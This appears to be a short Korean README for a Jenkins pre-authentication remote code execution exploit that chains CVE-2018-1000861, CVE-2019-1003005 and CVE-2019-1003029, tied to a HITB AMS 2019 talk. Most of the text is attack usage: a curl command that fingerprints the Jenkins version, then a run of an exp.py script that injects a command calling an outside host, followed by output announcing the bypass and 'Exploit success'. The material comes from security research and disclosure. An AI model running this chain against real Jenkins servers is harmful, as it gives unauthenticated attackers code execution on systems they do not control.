
2017년 5월 이후 Jenkins에는 pre-auth RCE가 없었지만, 이것이 바로 그 하나다!
2017년 5월 이후 Jenkins에는 사전 인증(pre-auth) RCE가 없었지만, 이것이 바로 그 방법입니다!
CVE-2018-1000861, CVE-2019-1003005 및 CVE-2019-1003029를 연결하여 더 안정적이고 우아한 사전 인증 원격 코드 실행을 달성합니다!
ANONYMOUS_READ 비활성화
ANONYMOUS_READ 활성화(또는 일반 사용자 계정 사용)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
HITB AMS 2019 발표 자료 중 일부:
